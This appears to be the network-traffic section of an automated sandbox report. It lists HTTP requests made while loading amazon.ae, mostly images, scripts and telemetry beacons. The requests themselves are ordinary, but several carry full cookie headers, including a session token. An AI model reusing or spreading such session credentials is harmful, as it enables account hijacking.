    Source: global trafficHTTP traffic detected: GET /images/I/61VxZ5U8MKL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71OCfsKG5nL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/6161ZPWqSFL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41mCsNYIizL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31hiPNm4EZL.js HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61EnuTSAVeL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/events/com.amazon.eel.SearchAutocompleteUIServiceMetrics.nexus HTTP/1.1Host: unagi.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/I/31cg0UKXQaL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81gec8z2nBL.js HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/91MiySd58vL.js HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71AI-Sm8v2L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61931GDnYxL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31i1PvcIFgL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3D646E5TEYAMSGQRNCHWPV%26ue%3D3%26bb%3D1115%26ns%3D1199%26ne%3D1297%26af%3D1300%26be%3D6775%26fp%3D1297%26fcp%3D1297%26pc%3D11396%26tc%3D-1475%26na_%3D-1475%26ul_%3D-1723729094514%26_ul%3D-1723729094514%26rd_%3D-1723729094514%26_rd%3D-1723729094514%26fe_%3D-1471%26lk_%3D-1450%26_lk%3D-1450%26co_%3D-1450%26_co%3D-813%26sc_%3D-1450%26rq_%3D-813%26rs_%3D-25%26_rs%3D1008%26dl_%3D-17%26di_%3D6838%26de_%3D6838%26_de%3D6849%26_dc%3D11395%26ld_%3D11395%26_ld%3D-1723729094514%26ntd%3D-1%26ty%3D0%26rc%3D0%26hob%3D2%26hoe%3D3%26ld%3D11398%26t%3D1723729105912%26ctb%3D1%26rt%3D_af%3A7-2-3-1-2-4-0_ld%3A57-10-5-35-5-6-0%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7Caui%3Asw%3Apage_proxy%3Ano_ctrl%7CmutObsYes%7CmutObsActive%7Cewc%3Aunpersist%7Cewc%3Aunpersist%3Aemptycart%7Cewc%3Abview%7Cewc%7Cewc%3Aunrec%7Cewc%3Acartsize%3A0%7Cewc%3Aaui%7Cnavbar%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7CperfYes%7Cfy_cdn_fr%7Cak_cdn_mp%7Cadblk_no%7Ccsm-feature-touch-enabled%3Afalse%26viz%3Dvisible%3A3%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26ui%3D2%26lob%3D1:11400 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259753_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259754_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D71%26pc0%3D1088%26ld0%3D1088%26t0%3D1723729095602%26sc1%3Dportal-bb%26pc1%3D63%26ld1%3D63%26t1%3D1723729095694%26sc2%3Dcarousel-v2_apb-browse_5%26bb2%3D1306%26be2%3D1337%26pc2%3D7276%26ld2%3D7276%26t2%3D1723729101790%26sc3%3Dsobe_logof_d_b_%26bb3%3D1407%26cf3%3D1410%26pc3%3D1411%26ld3%3D1411%26t3%3D1723729095925%26sc4%3Dcarousel-v2_apb-browse_12%26bb4%3D1377%26be4%3D1381%26pc4%3D7276%26ld4%3D7276%26t4%3D1723729101790%26sc5%3DcsmCELLSframework%26bb5%3D6777%26pc5%3D6777%26ld5%3D6777%26t5%3D1723729101291%26sc6%3DcsmCELLSpdm%26bb6%3D6777%26pc6%3D6781%26ld6%3D6781%26t6%3D1723729101295%26sc7%3DcsmCELLSvpm%26bb7%3D6781%26pc7%3D6781%26ld7%3D6781%26t7%3D1723729101295%26sc8%3DcsmCELLSfem%26bb8%3D6781%26pc8%3D6781%26ld8%3D6781%26t8%3D1723729101295%26sc9%3Due_sushi_v1%26bb9%3D6782%26pc9%3D6782%26ld9%3D6782%26t9%3D1723729101296%26ctb%3D1:11400 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/I/31bJewCvY-L.js HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/412wR+9jt1L.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/21t7odqgLrL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31OWvO7ZDCL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/21SFlGXwMGL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/iu3?d=amazon.ae&slot=navFooter&a2=0101ea4ef5389a5c57e24d430a268c4430b4509d0a53852f76d6a2872cad8dfecd06&old_oo=0&ts=1723729095791&s=ASS7k3cmwUH4OC1O9BSIEM7rXLw16XAgRkpA7IxVAtpk&gdpr_consent=&gdpr_consent_avl=&cb=1723729095791 HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3D646E5TEYAMSGQRNCHWPV%26ue%3D3%26bb%3D1115%26ns%3D1199%26ne%3D1297%26af%3D1300%26be%3D6775%26fp%3D1297%26fcp%3D1297%26pc%3D11396%26tc%3D-1475%26na_%3D-1475%26ul_%3D-1723729094514%26_ul%3D-1723729094514%26rd_%3D-1723729094514%26_rd%3D-1723729094514%26fe_%3D-1471%26lk_%3D-1450%26_lk%3D-1450%26co_%3D-1450%26_co%3D-813%26sc_%3D-1450%26rq_%3D-813%26rs_%3D-25%26_rs%3D1008%26dl_%3D-17%26di_%3D6838%26de_%3D6838%26_de%3D6849%26_dc%3D11395%26ld_%3D11395%26_ld%3D-1723729094514%26ntd%3D-1%26ty%3D0%26rc%3D0%26hob%3D2%26hoe%3D3%26ld%3D11398%26t%3D1723729105912%26ctb%3D1%26rt%3D_af%3A7-2-3-1-2-4-0_ld%3A57-10-5-35-5-6-0%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7Caui%3Asw%3Apage_proxy%3Ano_ctrl%7CmutObsYes%7CmutObsActive%7Cewc%3Aunpersist%7Cewc%3Aunpersist%3Aemptycart%7Cewc%3Abview%7Cewc%7Cewc%3Aunrec%7Cewc%3Acartsize%3A0%7Cewc%3Aaui%7Cnavbar%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7CperfYes%7Cfy_cdn_fr%7Cak_cdn_mp%7Cadblk_no%7Ccsm-feature-touch-enabled%3Afalse%26viz%3Dvisible%3A3%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26ui%3D2%26lob%3D1:11400 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/I/81VrW5EM1NL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31rmbAnPYIL.AC_SX250.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D3545%26pc%3D11439%26at%3D11439%26t%3D1723729105953%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:11439 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D71%26pc0%3D1088%26ld0%3D1088%26t0%3D1723729095602%26sc1%3Dportal-bb%26pc1%3D63%26ld1%3D63%26t1%3D1723729095694%26sc2%3Dcarousel-v2_apb-browse_5%26bb2%3D1306%26be2%3D1337%26pc2%3D7276%26ld2%3D7276%26t2%3D1723729101790%26sc3%3Dsobe_logof_d_b_%26bb3%3D1407%26cf3%3D1410%26pc3%3D1411%26ld3%3D1411%26t3%3D1723729095925%26sc4%3Dcarousel-v2_apb-browse_12%26bb4%3D1377%26be4%3D1381%26pc4%3D7276%26ld4%3D7276%26t4%3D1723729101790%26sc5%3DcsmCELLSframework%26bb5%3D6777%26pc5%3D6777%26ld5%3D6777%26t5%3D1723729101291%26sc6%3DcsmCELLSpdm%26bb6%3D6777%26pc6%3D6781%26ld6%3D6781%26t6%3D1723729101295%26sc7%3DcsmCELLSvpm%26bb7%3D6781%26pc7%3D6781%26ld7%3D6781%26t7%3D1723729101295%26sc8%3DcsmCELLSfem%26bb8%3D6781%26pc8%3D6781%26ld8%3D6781%26t8%3D1723729101295%26sc9%3Due_sushi_v1%26bb9%3D6782%26pc9%3D6782%26ld9%3D6782%26t9%3D1723729101296%26ctb%3D1:11400 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259753_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259754_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31bJewCvY-L.js HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
